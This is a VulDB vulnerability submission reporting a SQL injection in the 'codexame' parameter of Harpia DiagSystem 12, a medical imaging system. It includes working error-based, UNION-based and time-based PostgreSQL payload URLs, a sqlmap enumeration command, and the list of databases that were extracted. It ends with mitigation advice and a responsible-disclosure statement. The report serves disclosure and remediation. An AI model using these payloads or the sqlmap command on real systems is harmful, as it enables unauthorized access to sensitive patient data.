Submit #497125: harpia.com.br DiagSystem 12 SQL Injectioninfo

Titelharpia.com.br DiagSystem 12 SQL Injection
Beschreibung**# Proof of Concept - SQL Injection Vulnerability in DiagSystem by Harpia** ## **Summary** A SQL Injection vulnerability was identified in the DiagSystem software developed by Harpia. The vulnerability allows an attacker to execute arbitrary SQL queries on the backend database, potentially leading to unauthorized data access and system compromise. Link print SQLI: https://drive.google.com/file/d/10IspKbYh7TYmxRPRIQZ7oRg6Xise8ykJ/view?usp=sharing ## **Vulnerability Details** - **Vendor**: Harpia - **Product**: DiagSystem - **Affected Endpoint**: `/diagsystem/PACS/atualatendimento_jpeg.php` - **Vulnerable Parameter**: `codexame` - **Vulnerability Type**: SQL Injection (Error-Based, Time-Based, and UNION-Based) - **DBMS**: PostgreSQL ## **Proof of Concept** Vulnerability Details Affected Endpoint: http://x.x.x.x:8081/diagsystem/PACS/atualatendimento_jpeg.php Vulnerable Parameter: codexame DBMS: PostgreSQL Impact: Information disclosure, unauthorized access to sensitive data Technical Details The codexame parameter is vulnerable to SQL Injection, allowing an attacker to manipulate database queries. Injection Type Error-Based SQL Injection Boolean-Based Blind SQL Injection UNION-Based SQL Injection Time-Based Blind SQL Injection Exploitable Payloads Error-Based SQL Injection http://x.x.x.x:8081/diagsystem/PACS/atualatendimento_jpeg.php?cod=10677448&tp=JPEG&codexame=10677448 AND 7964=CAST((CHR(113)||CHR(107)||CHR(107)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (7964=7964) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(118)||CHR(112)||CHR(113)) AS NUMERIC) UNION-Based SQL Injection http://x.x.x.x:8081/diagsystem/PACS/atualatendimento_jpeg.php?cod=10677448&tp=JPEG&codexame=-7842 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(107)||CHR(107)||CHR(106)||CHR(113))||(CHR(67)||CHR(90)||CHR(87)||CHR(111)||CHR(116)||CHR(72)||CHR(81)||CHR(88)||CHR(76)||CHR(100)||CHR(106)||CHR(110)||CHR(101)||CHR(100)||CHR(115)||CHR(72)||CHR(106)||CHR(70)||CHR(116)||CHR(111)||CHR(76)||CHR(83)||CHR(86)||CHR(67)||CHR(121)||CHR(67)||CHR(118)||CHR(100)||CHR(105)||CHR(88)||CHR(115)||CHR(122)||CHR(107)||CHR(74)||CHR(115)||CHR(72)||CHR(116)||CHR(80)||CHR(90)||CHR(118))||(CHR(113)||CHR(122)||CHR(118)||CHR(112)||CHR(113))-- Time-Based Blind SQL Injection http://x.x.x.x:8081/diagsystem/PACS/atualatendimento_jpeg.php?cod=10677448&tp=JPEG&codexame=10677448 AND 3841=(SELECT 3841 FROM PG_SLEEP(5)) ### Database Enumeration Using SQLMap, the following command was executed to retrieve available databases: sqlmap -r request.txt --level=5 --risk=3 --batch --dbs --random-agent --tamper=space2comment ### Extracted Databases information_schema pg_catalog pg_temp_42 pg_temp_69 public ### **Impact** The exploitation of this vulnerability allows an attacker to: - Enumerate database names. - List tables within the public schema. - Extract sensitive information from the database. ## **Mitigation** It is strongly recommended that Harpia: - Implement prepared statements and parameterized queries. - Sanitize and validate user input before processing database queries. - Restrict database permissions following the principle of least privilege. - Conduct security testing to identify and mitigate similar vulnerabilities. ## **Responsible Disclosure** This report is being submitted following ethical guidelines. We only enumerated database names and listed tables within the public schema. No further exploitation was performed to preserve the integrity of the system. The vendor is advised to assess and remediate the vulnerability as soon as possible.
Quelle⚠️ http://x.x.x.x:8081/diagsystem/PACS/atualatendimento_jpeg.php?cod=10677448&tp=JPEG&codexame=-7842 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(107)||CHR(107)||CHR(106)||CHR(113))||(CHR(67)||CHR(90)||CHR(87)||CHR(111)||CHR(116)||CHR(72)||CHR(81)||CHR(88)
Benutzer
 Samuel Jesus (UID 81288)
Einreichung09.02.2025 01:40 (vor 1 Jahr)
Moderieren21.02.2025 09:20 (12 days later)
StatusAkzeptiert
VulDB Eintrag296477 [Harpia DiagSystem 12 atualatendimento_jpeg.php codexame SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Interested in the pricing of exploits?

See the underground prices here!